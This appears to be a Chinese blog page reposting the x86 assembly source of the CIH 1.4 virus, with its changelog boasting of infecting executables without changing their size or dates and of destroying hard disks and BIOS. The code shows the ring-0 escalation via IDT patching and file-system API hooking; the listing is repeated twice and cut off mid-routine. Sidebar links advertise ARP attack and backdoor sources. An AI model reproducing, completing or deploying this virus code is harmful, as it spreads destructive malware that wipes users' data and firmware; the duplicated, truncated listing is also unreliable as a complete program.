宋科明
- 浏览: 99550 次
- 性别:
- 来自: 深圳
-
最新评论
-
zpap:
这样的的设置好像是有问题的..
JDK环境变量配置小工具 -
qiaoxia_lan:
都不能访问,这是怎么回事啊。
为JAVA爱好者提供了超过400本电子书和3部视频 -
Tortoise:
最好多一些视频文件,个人感觉比较好一点
为JAVA爱好者提供了超过400本电子书和3部视频 -
skj198568:
看看了,好书还不少。
为JAVA爱好者提供了超过400本电子书和3部视频 -
njuptsoz:
谢谢分享!
JDK环境变量配置小工具
CIH 1.4源程序
信息来源:黑客防线
; ********************************************************************
********
; * The Virus Program Information
*
; ********************************************************************
********
; *
*
; * Designer : CIH Source : TTIT of TATUNG in Tai
wan *
; * Create Date : 04/26/1998 Now Version : 1.4
*
; * Modification Time : 05/31/1998
*
; *
*
; * Turbo Assembler Version 4.0 : tasm /m cih
*
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe
*
; *
*
; *===================================================================
=======*
; * Modification History
*
; *===================================================================
=======*
; * v1.0 1. Create the Virus Program.
*
; * 2. The Virus Modifies IDT to Get Ring0 Privilege.
*
; * 04/26/1998 3. Virus Code doesn't Reload into System.
*
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File S
ystem. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApi
Hook. *
; * 6. When System Opens Existing PE File, the File will b
e *
; * Infected, and the File doesn't be Reinfected.
*
; * 7. It is also Infected, even the File is Read-Only.
*
; * 8. When the File is Infected, the Modification Date an
d Time *
; * of the File also don't be Changed.
*
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not
Call *
; * Previous FileSystemApiHook, it will Call the Functi
on *
; * that the IFS Manager Would Normally Call to Impleme
nt *
; * this Particular I/O Request.
*
; * 10. The Virus Size is only 656 Bytes.
*
; *===================================================================
=======*
; * v1.1 1. Especially, the File that be Infected will not Incr
ease *
; * it's Size... ^__^
*
; * 05/15/1998 2. Hook and Modify Structured Exception Handing.
*
; * When Exception Error Occurs, Our OS System should b
e in *
; * Windows NT. So My Cute Virus will not Continue to R
un, *
; * it will Jmup to Original Application to Run.
*
; * 3. Use Better Algorithm, Reduce Virus Code Size.
*
; * 4. The Virus "Basic" Size is only 796 Bytes.
*
; *===================================================================
=======*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...
*
; * 2. Modify the Bug of v1.1
*
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.
*
; *===================================================================
=======*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Er
ror. *
; * So When Open WinZip Self-Extractor ==> Don't Infect
it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes.
*
; *===================================================================
=======*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs
Error. *
; * 2. Change the Date of Killing Computers.
*
; * 05/31/1998 3. Modify Virus Version Copyright.
*
; * 4. The Virus "Basic" Size is 1019 Bytes.
*
; ********************************************************************
********
.586P
; ********************************************************************
********
; * Original PE Executable File(Don't Modify this Section)
*
; ********************************************************************
********
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF
= 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Excep
tion
mov [ebx+02h], si ; Entry Point
Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateExce
ption
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateExce
ption Aga
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to S
tack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-Return
AddressOf
dException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My V
irus Exis
in System
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocat
e
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, a
nd flags
add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory S
tart Addr
s
lea eax, MyVirusStart-@2[esi]
iretd ; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSyste
mApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, a
nd flags
mov dr0, eax ; Save OldFileSystemAp
iHook Add
ss
pop eax ; EAX = FileSystemApiHook Addr
ess
; Save Old IFSMgr_InstallFileSystemApiHook Ent
ry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@
2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], e
dx
; Modify IFSMgr_InstallFileSystemApiHook Entry
Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
CodeSizeOfMergeVirusCodeSection = offset $
; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************
InstallFileSystemApiHook:
push ebx
call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemAp
iHook
add ebx, FileSystemApiHook-@4 ;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystem
ApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, a
nd flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHoo
k
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHoo
k
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystem
ApiHook A
ress
pop eax
pop ebx
ret
; *********************************************************
; * Static Data *
; *********************************************************
OldInstallFileSystemApiHook dd ?
&nb
; ********************************************************************
********
; * The Virus Program Information
*
; ********************************************************************
********
; *
*
; * Designer : CIH Source : TTIT of TATUNG in Tai
wan *
; * Create Date : 04/26/1998 Now Version : 1.4
*
; * Modification Time : 05/31/1998
*
; *
*
; * Turbo Assembler Version 4.0 : tasm /m cih
*
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe
*
; *
*
; *===================================================================
=======*
; * Modification History
*
; *===================================================================
=======*
; * v1.0 1. Create the Virus Program.
*
; * 2. The Virus Modifies IDT to Get Ring0 Privilege.
*
; * 04/26/1998 3. Virus Code doesn't Reload into System.
*
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File S
ystem. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApi
Hook. *
; * 6. When System Opens Existing PE File, the File will b
e *
; * Infected, and the File doesn't be Reinfected.
*
; * 7. It is also Infected, even the File is Read-Only.
*
; * 8. When the File is Infected, the Modification Date an
d Time *
; * of the File also don't be Changed.
*
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not
Call *
; * Previous FileSystemApiHook, it will Call the Functi
on *
; * that the IFS Manager Would Normally Call to Impleme
nt *
; * this Particular I/O Request.
*
; * 10. The Virus Size is only 656 Bytes.
*
; *===================================================================
=======*
; * v1.1 1. Especially, the File that be Infected will not Incr
ease *
; * it's Size... ^__^
*
; * 05/15/1998 2. Hook and Modify Structured Exception Handing.
*
; * When Exception Error Occurs, Our OS System should b
e in *
; * Windows NT. So My Cute Virus will not Continue to R
un, *
; * it will Jmup to Original Application to Run.
*
; * 3. Use Better Algorithm, Reduce Virus Code Size.
*
; * 4. The Virus "Basic" Size is only 796 Bytes.
*
; *===================================================================
=======*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...
*
; * 2. Modify the Bug of v1.1
*
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.
*
; *===================================================================
=======*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Er
ror. *
; * So When Open WinZip Self-Extractor ==> Don't Infect
it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes.
*
; *===================================================================
=======*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs
Error. *
; * 2. Change the Date of Killing Computers.
*
; * 05/31/1998 3. Modify Virus Version Copyright.
*
; * 4. The Virus "Basic" Size is 1019 Bytes.
*
; ********************************************************************
********
.586P
; ********************************************************************
********
; * Original PE Executable File(Don't Modify this Section)
*
; ********************************************************************
********
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF
= 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Excep
tion
mov [ebx+02h], si ; Entry Point
Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateExce
ption
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateExce
ption Aga
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to S
tack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-Return
AddressOf
dException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My V
irus Exis
in System
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocat
e
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, a
nd flags
add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory S
tart Addr
s
lea eax, MyVirusStart-@2[esi]
iretd ; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSyste
mApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, a
nd flags
mov dr0, eax ; Save OldFileSystemAp
iHook Add
ss
pop eax ; EAX = FileSystemApiHook Addr
ess
; Save Old IFSMgr_InstallFileSystemApiHook Ent
ry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@
2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], e
dx
; Modify IFSMgr_InstallFileSystemApiHook Entry
Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
CodeSizeOfMergeVirusCodeSection = offset $
; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************
InstallFileSystemApiHook:
push ebx
call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemAp
iHook
add ebx, FileSystemApiHook-@4 ;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystem
ApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, a
nd flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHoo
k
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHoo
k
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystem
ApiHook A
ress
pop eax
pop ebx
ret
; *********************************************************
; * Static Data *
; *********************************************************
OldInstallFileSystemApiHook dd ?
&nb
分享到:
发表评论
-
为JAVA爱好者提供了超过400本电子书和3部视频
2009-01-10 14:20 2436http://www.ibook8.com/book/java ... -
http://blog.csdn.net/ycw/
2008-08-08 15:52 811http://blog.csdn.net/ycw/ ... -
WinCVS与CVSNT简明使用手则
2008-08-08 15:51 1195WinCVS与CVSNT简明使用手 ... -
WinCVS与CVSNT简明使用手则
2008-08-08 15:50 11061、前言:CVS是版本控制 ... -
CVS使用手册(推荐)
2008-08-08 15:47 1243版权声明:可以任意转载,转载时请务必以超链接形式标明文章原始出 ... -
用cvs实现复杂的权限控制
2008-08-08 15:46 3466作者:张元一这篇文章的基础是:为CVS建立只读用户,如果你对C ... -
CVSNT用户管理方案
2008-08-08 15:46 1090所有这些操作基于的环境和软件版本:WINDOWS2000 Pr ... -
CVS中增加目录及标签和分支
2008-08-08 15:44 30241.在cvs中增加目录. 如果要在CVS中增加一个目录层,而不 ... -
CVS权限设置
2008-08-08 15:43 2244不同用户设置不同的访 ... -
关于CVS在Window2000下的权限管理
2008-08-08 15:40 863一. CVS版本问题 CVS分开客户端和服务器端两个程序 ... -
数据感知控件之浮想联翩
2008-07-19 15:44 1047Delphi制作数据感知控件之浮想联翩 知识点本文共有6个关于 ... -
SQL备份
2008-07-17 10:01 752备份: backupsql := 'backup databa ... -
SQL导入/导出Excel
2008-07-17 10:01 1125这是在CSDN上邹键的东 ... -
portscan程序代码
2008-06-25 16:33 832#include <afxext.h> #incl ... -
ARP攻击软件源码
2008-06-25 16:29 1326/****************************** ... -
微软ping命令的源代码
2008-06-25 16:29 818/****************************** ... -
MD5破解相关MAKE.bat
2008-06-25 16:27 1009信息来源:xfocus z:\md5coll>MAKE ... -
一段隐藏文件的C++程序源代码
2008-06-25 16:25 2645#include <iostream>#inclu ... -
TCP多线程正向后门源代码
2008-06-25 16:23 1172#!usr/bin/perl -w #duo_xian_nc. ... -
简易Telnet后门源代码
2008-06-25 16:19 1879/////////////////////////////// ...
相关推荐
对 CIH 进行了详细的说明,但需要汇编基础。
C++编写的清除CIH病毒程序源代码,C++编写的清除CIH病毒程序源代码
CIH病毒免疫程序(63KB)
CIH病毒免疫程序,可以通过这个程序大致了解CIH病毒代码的基本特征,希望能有用处。
这是一个最新的版本啊! 作者:陈盈豪
cih源代码[参照].pdf
* Create Date : 04/26/1998 Now Version : 1.4 * ; * Modification Time : 05/31/1998 * ; * * ; * Turbo Assembler Version 4.0 : tasm /m cih * ; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe *
这是CIH程序的源码, 以及其所用的Turbo Assembler 编译器, 和二进制原版程序。 CIH的功能是将自身复制到其他的exe文件,调用Windows 9x系统的内核vxd, 以及改写早期计算机的BIOS, 读写硬盘等。 解压密码: m0_...
联想CIH81M 主板BIOS 好板编程器读出 8M文件
病毒CIH源码.txt
联想一体机C440 cih61s1 ver1.0 图纸 联想C440 cih61s1 ver1.0 图纸
CIH源码
CIH源码
第一步:如果现在开机无自检,屏幕黑屏,您的计算机主板上的BIOS已经遭受破坏,可与当地的计算机公司联系,恢复BIOS中的程序即可。 第二步:如果开机有自检,没有出现黑屏,但是,硬盘不能启动,说明CIH病毒破坏了...
CIH 病毒原理的应用--物理内存的读写 CIH 病毒原理的应用--物理内存的读写 CIH 病毒原理的应用--物理内存的读写 CIH 病毒原理的应用--物理内存的读写
CIH病毒处理与防范,关键词,计算机病毒,解析,防范措施。
1、瑞星公司提供的本程序只是针对CIH病毒破坏的硬盘进行修复,对于正常的硬盘不要使用本程序处理。 2、本程序不保证修复所有硬盘数据,也不能保证修复后的数据是完全正确的,只是尽可能修复用户数据。 本...
CIH源码及中文注释
CIH 病毒原理的应用——物理内存的读写 希望对大家有用
有代码 CIH 硬盘 破坏 剖析